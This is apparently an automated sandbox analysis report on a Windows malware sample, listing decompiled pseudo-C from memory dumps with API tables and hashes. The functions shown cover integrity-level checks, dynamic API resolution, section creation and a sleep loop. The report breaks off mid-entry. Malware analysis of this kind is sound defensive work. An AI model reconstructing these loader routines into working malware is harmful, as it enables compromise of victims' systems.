                                                                                                                                                                                                    0x04f6661a
                                                                                                                                                                                                    0x04f6661e
                                                                                                                                                                                                    0x04f6666c
                                                                                                                                                                                                    0x04f66620
                                                                                                                                                                                                    0x04f6662d
                                                                                                                                                                                                    0x04f6663d
                                                                                                                                                                                                    0x04f66645
                                                                                                                                                                                                    0x04f66657
                                                                                                                                                                                                    0x04f6665b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f66647
                                                                                                                                                                                                    0x04f6664a
                                                                                                                                                                                                    0x04f6664f
                                                                                                                                                                                                    0x04f66651
                                                                                                                                                                                                    0x04f66651
                                                                                                                                                                                                    0x04f6662f
                                                                                                                                                                                                    0x04f66631
                                                                                                                                                                                                    0x04f6665d
                                                                                                                                                                                                    0x04f6665e
                                                                                                                                                                                                    0x04f6665e
                                                                                                                                                                                                    0x04f6662d
                                                                                                                                                                                                    0x04f66673

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04F64F74,?,?,4D283A53,?,?), ref: 04F665BD
                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04F665D3
                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 04F665F8
                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,04F6D2A8,00000004,00000000,00001000,?), ref: 04F66614
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04F64F74,?,?,4D283A53), ref: 04F66626
                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04F6663D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04F64F74,?,?), ref: 04F6665E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04F64F74,?,?,4D283A53), ref: 04F66666
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1814172918-0
                                                                                                                                                                                                    • Opcode ID: 7f73a5fc590bf104d43b7e2ac4e05cfc7343cec1142aa9a9db67466a7f325f12
                                                                                                                                                                                                    • Instruction ID: b50e79fe120eeea1fa95fdb9c050d28624d27bd8be005afe789c895e2a133cc2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f73a5fc590bf104d43b7e2ac4e05cfc7343cec1142aa9a9db67466a7f325f12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121E472A00208FBE711AFA4FD05F8D7BA9EB84710F144121F656EB1C0EB75E906DB60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F66B7B(long* _a4) {
                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				void _v16;
                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v16 = 1;
                                                                                                                                                                                                    				_v20 = 0x2000;
                                                                                                                                                                                                    				if( *0x4f6d25c > 5) {
                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                                                    							_t46 = E04F68D59(_v8);
                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                    								if(_t33 != 0) {
                                                                                                                                                                                                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E04F6677C(_t46);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						CloseHandle(_v12);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *_a4 = _v20;
                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x04f66b88
                                                                                                                                                                                                    0x04f66b8f
                                                                                                                                                                                                    0x04f66b96
                                                                                                                                                                                                    0x04f66baa
                                                                                                                                                                                                    0x04f66bb5
                                                                                                                                                                                                    0x04f66bcd
                                                                                                                                                                                                    0x04f66bda
                                                                                                                                                                                                    0x04f66bdd
                                                                                                                                                                                                    0x04f66be2
                                                                                                                                                                                                    0x04f66bed
                                                                                                                                                                                                    0x04f66bf1
                                                                                                                                                                                                    0x04f66c00
                                                                                                                                                                                                    0x04f66c04
                                                                                                                                                                                                    0x04f66c20
                                                                                                                                                                                                    0x04f66c20
                                                                                                                                                                                                    0x04f66c24
                                                                                                                                                                                                    0x04f66c24
                                                                                                                                                                                                    0x04f66c29
                                                                                                                                                                                                    0x04f66c2d
                                                                                                                                                                                                    0x04f66c33
                                                                                                                                                                                                    0x04f66c34
                                                                                                                                                                                                    0x04f66c3b
                                                                                                                                                                                                    0x04f66c41

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04F66BAD
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04F66BCD
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04F66BDD
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04F66C2D
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04F66C00
                                                                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04F66C08
                                                                                                                                                                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04F66C18
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1295030180-0
                                                                                                                                                                                                    • Opcode ID: c6bb4c7e07064c441a0579da69713cc8e64f247d5a81e6f320580e0dc5b5b12d
                                                                                                                                                                                                    • Instruction ID: e2c5a1835e8cca22bb8191177101068f39e0b8f96a899cacb8f5382c21e4d579
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6bb4c7e07064c441a0579da69713cc8e64f247d5a81e6f320580e0dc5b5b12d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3021397590024DFFEB009FA5ED84EAEBFB9EB48305F0040A6E911A6261D7759E05EF60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				long _t9;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t9 = _a8;
                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                    					_t10 = InterlockedDecrement(0x404108);
                                                                                                                                                                                                    					__eflags = _t10;
                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                    						__eflags =  *0x40410c;
                                                                                                                                                                                                    						if( *0x40410c != 0) {
                                                                                                                                                                                                    							_t36 = 0x2710;
                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                    								SleepEx(0x64, 1);
                                                                                                                                                                                                    								__eflags =  *0x404118;
                                                                                                                                                                                                    								if( *0x404118 == 0) {
                                                                                                                                                                                                    									break;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t36 = _t36 - 0x64;
                                                                                                                                                                                                    								__eflags = _t36;
                                                                                                                                                                                                    								if(_t36 > 0) {
                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							CloseHandle( *0x40410c);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						HeapDestroy( *0x404110);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
                                                                                                                                                                                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                    						 *0x404110 = _t18;
                                                                                                                                                                                                    						_t41 = _t18;
                                                                                                                                                                                                    						if(_t18 == 0) {
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0x404130 = _a4;
                                                                                                                                                                                                    							asm("lock xadd [eax], ebx");
                                                                                                                                                                                                    							_t23 = CreateThread(0, 0, E00401C56, E00401561(_a12, 0, 0x404118, _t41), 0,  &_a8); // executed
                                                                                                                                                                                                    							 *0x40410c = _t23;
                                                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                                                    								asm("lock xadd [esi], eax");
                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x00401cf3
                                                                                                                                                                                                    0x00401cff
                                                                                                                                                                                                    0x00401d01
                                                                                                                                                                                                    0x00401d04
                                                                                                                                                                                                    0x00401d7e
                                                                                                                                                                                                    0x00401d84
                                                                                                                                                                                                    0x00401d86
                                                                                                                                                                                                    0x00401d88
                                                                                                                                                                                                    0x00401d8e
                                                                                                                                                                                                    0x00401d90
                                                                                                                                                                                                    0x00401d95
                                                                                                                                                                                                    0x00401d98
                                                                                                                                                                                                    0x00401da3
                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                    0x00401daa
                                                                                                                                                                                                    0x00401dac
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401dac
                                                                                                                                                                                                    0x00401db4
                                                                                                                                                                                                    0x00401db4
                                                                                                                                                                                                    0x00401dc0
                                                                                                                                                                                                    0x00401dc0
                                                                                                                                                                                                    0x00401d06
                                                                                                                                                                                                    0x00401d07
                                                                                                                                                                                                    0x00401d27
                                                                                                                                                                                                    0x00401d2d
                                                                                                                                                                                                    0x00401d32
                                                                                                                                                                                                    0x00401d34
                                                                                                                                                                                                    0x00401d74
                                                                                                                                                                                                    0x00401d74
                                                                                                                                                                                                    0x00401d36
                                                                                                                                                                                                    0x00401d3e
                                                                                                                                                                                                    0x00401d45
                                                                                                                                                                                                    0x00401d5e
                                                                                                                                                                                                    0x00401d64
                                                                                                                                                                                                    0x00401d6b
                                                                                                                                                                                                    0x00401d70
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d70
                                                                                                                                                                                                    0x00401d6b
                                                                                                                                                                                                    0x00401d34
                                                                                                                                                                                                    0x00401d07
                                                                                                                                                                                                    0x00401dcd

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00404108), ref: 00401D12
                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401D27
                                                                                                                                                                                                    • CreateThread.KERNELBASE ref: 00401D5E
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00404108), ref: 00401D7E
                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 00401D98
                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00401DB4
                                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 00401DC0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3416589138-0
                                                                                                                                                                                                    • Opcode ID: ddb2b96d5c708932e4b0c558f0eddb403d08667cc98ce577c3679f7e51c1755b
                                                                                                                                                                                                    • Instruction ID: 6fcd509cf257aef5abbb9606cbe86a7790ff700fb6e5caadd06873bd984d6892
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddb2b96d5c708932e4b0c558f0eddb403d08667cc98ce577c3679f7e51c1755b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5221A4B1A01205ABC7119F68ED88A2A7BB8EBD5761710453AF605F72B0D7789D408B9C
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 04F6959C
                                                                                                                                                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04F6961F
                                                                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04F6965F
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F69681
                                                                                                                                                                                                      • Part of subcall function 04F62CC3: SysAllocString.OLEAUT32(04F6C2A8), ref: 04F62D13
                                                                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(00000000), ref: 04F696D4
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F696E3
                                                                                                                                                                                                      • Part of subcall function 04F63651: Sleep.KERNELBASE(000001F4), ref: 04F63699
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2118684380-0
                                                                                                                                                                                                    • Opcode ID: b2a6ce71dfc38bee6b88fb9967bc583f8e06bba509b97c422a3b00c58677cacc
                                                                                                                                                                                                    • Instruction ID: e7659fbc296808ba1140c9e8a6956f335b711232d9b74c0ba8e34bc6a6b82b7b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2a6ce71dfc38bee6b88fb9967bc583f8e06bba509b97c422a3b00c58677cacc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53515075A00609EFDB01DFA8D844E9EB7B5FF88704B148829E916DB224DB76ED06CB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E004018E1(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                    				struct HINSTANCE__* _t48;
                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t54 = E00401669(0x20);
                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t48 = GetModuleHandleA( *0x404144 + 0x405014);
                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                    					_t28 = GetProcAddress(_t48,  *0x404144 + 0x40514c);
                                                                                                                                                                                                    					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						E00401E78(_t54);
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t32 = GetProcAddress(_t48,  *0x404144 + 0x40515c);
                                                                                                                                                                                                    						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t35 = GetProcAddress(_t48,  *0x404144 + 0x40516f);
                                                                                                                                                                                                    							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                    							if(_t35 == 0) {
                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t38 = GetProcAddress(_t48,  *0x404144 + 0x405184);
                                                                                                                                                                                                    								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                    								if(_t38 == 0) {
                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t41 = GetProcAddress(_t48,  *0x404144 + 0x40519a);
                                                                                                                                                                                                    									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                    									if(_t41 == 0) {
                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                    										_t44 = E00401DD0(_t54, _a8); // executed
                                                                                                                                                                                                    										_v8 = _t44;
                                                                                                                                                                                                    										if(_t44 != 0) {
                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											 *_a12 = _t54;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x004018f0
                                                                                                                                                                                                    0x004018f4
                                                                                                                                                                                                    0x004019b6
                                                                                                                                                                                                    0x004018fa
                                                                                                                                                                                                    0x00401912
                                                                                                                                                                                                    0x00401921
                                                                                                                                                                                                    0x00401928
                                                                                                                                                                                                    0x0040192a
                                                                                                                                                                                                    0x0040192f
                                                                                                                                                                                                    0x004019ae
                                                                                                                                                                                                    0x004019af
                                                                                                                                                                                                    0x00401931
                                                                                                                                                                                                    0x0040193e
                                                                                                                                                                                                    0x00401940
                                                                                                                                                                                                    0x00401945
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401947
                                                                                                                                                                                                    0x00401954
                                                                                                                                                                                                    0x00401956
                                                                                                                                                                                                    0x0040195b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040195d
                                                                                                                                                                                                    0x0040196a
                                                                                                                                                                                                    0x0040196c
                                                                                                                                                                                                    0x00401971
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401973
                                                                                                                                                                                                    0x00401980
                                                                                                                                                                                                    0x00401982
                                                                                                                                                                                                    0x00401987
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401989
                                                                                                                                                                                                    0x0040198f
                                                                                                                                                                                                    0x00401994
                                                                                                                                                                                                    0x0040199b
                                                                                                                                                                                                    0x004019a0
                                                                                                                                                                                                    0x004019a5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004019a7
                                                                                                                                                                                                    0x004019aa
                                                                                                                                                                                                    0x004019aa
                                                                                                                                                                                                    0x004019a5
                                                                                                                                                                                                    0x00401987
                                                                                                                                                                                                    0x00401971
                                                                                                                                                                                                    0x0040195b
                                                                                                                                                                                                    0x00401945
                                                                                                                                                                                                    0x0040192f
                                                                                                                                                                                                    0x004019c4

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00401669: HeapAlloc.KERNEL32(00000000,?,00401C8C,00000208,?,00000000,?,?,?,00401A31,?), ref: 00401675
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00401EB7,?,?,?,?,00000002,?,?), ref: 00401906
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401928
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040193E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401954
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040196A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401980
                                                                                                                                                                                                      • Part of subcall function 00401DD0: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401E2D
                                                                                                                                                                                                      • Part of subcall function 00401DD0: memset.NTDLL ref: 00401E4F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1632424568-0
                                                                                                                                                                                                    • Opcode ID: 5839b3d590868584526e62c697cb31cb46250381bf5d58689aecbbb281192ab0
                                                                                                                                                                                                    • Instruction ID: 2cc679a23218f69ad546e050f7e5039b607bd5f797de23e9bdc148eedc5c4804
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5839b3d590868584526e62c697cb31cb46250381bf5d58689aecbbb281192ab0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13213EB0A006069FD720DF69CD44E6BB7ECEF94304B004176E545EB261D778E904CBA9
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E04F61000(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				unsigned int _t23;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t26 = __edx;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                    				 *0x4f6d238 = _t10;
                                                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                                                    					 *0x4f6d1a8 = GetTickCount();
                                                                                                                                                                                                    					_t12 = E04F69864(_a4);
                                                                                                                                                                                                    					if(_t12 == 0) {
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                    							_t14 = SwitchToThread();
                                                                                                                                                                                                    							_t23 = _v12.dwHighDateTime;
                                                                                                                                                                                                    							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(9);
                                                                                                                                                                                                    							_push(_t23 >> 7);
                                                                                                                                                                                                    							_push(_t16);
                                                                                                                                                                                                    							L04F6B1A6();
                                                                                                                                                                                                    							_t33 = _t14 + _t16;
                                                                                                                                                                                                    							_t18 = E04F6904C(_a4, _t33);
                                                                                                                                                                                                    							_t19 = 2;
                                                                                                                                                                                                    							_t25 = _t33;
                                                                                                                                                                                                    							Sleep(_t19 << _t33); // executed
                                                                                                                                                                                                    						} while (_t18 == 1);
                                                                                                                                                                                                    						if(E04F6928F(_t25) != 0) {
                                                                                                                                                                                                    							 *0x4f6d260 = 1; // executed
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t12 = E04F64EE5(_t26); // executed
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t12 = 8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x04f61000
                                                                                                                                                                                                    0x04f61006
                                                                                                                                                                                                    0x04f61007
                                                                                                                                                                                                    0x04f61013
                                                                                                                                                                                                    0x04f61019
                                                                                                                                                                                                    0x04f61020
                                                                                                                                                                                                    0x04f61030
                                                                                                                                                                                                    0x04f61035
                                                                                                                                                                                                    0x04f6103c
                                                                                                                                                                                                    0x04f6103e
                                                                                                                                                                                                    0x04f61043
                                                                                                                                                                                                    0x04f61049
                                                                                                                                                                                                    0x04f6104f
                                                                                                                                                                                                    0x04f61059
                                                                                                                                                                                                    0x04f6105d
                                                                                                                                                                                                    0x04f6105f
                                                                                                                                                                                                    0x04f61064
                                                                                                                                                                                                    0x04f61065
                                                                                                                                                                                                    0x04f61066
                                                                                                                                                                                                    0x04f6106b
                                                                                                                                                                                                    0x04f61071
                                                                                                                                                                                                    0x04f6107a
                                                                                                                                                                                                    0x04f6107b
                                                                                                                                                                                                    0x04f61080
                                                                                                                                                                                                    0x04f61086
                                                                                                                                                                                                    0x04f61092
                                                                                                                                                                                                    0x04f61094
                                                                                                                                                                                                    0x04f61094
                                                                                                                                                                                                    0x04f6109e
                                                                                                                                                                                                    0x04f6109e
                                                                                                                                                                                                    0x04f61022
                                                                                                                                                                                                    0x04f61024
                                                                                                                                                                                                    0x04f61024
                                                                                                                                                                                                    0x04f610a8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04F691B4,?), ref: 04F61013
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04F61027
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04F691B4,?), ref: 04F61043
                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,04F691B4,?), ref: 04F61049
                                                                                                                                                                                                    • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04F61066
                                                                                                                                                                                                    • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04F691B4,?), ref: 04F61080
                                                                                                                                                                                                    Memory Dump Source
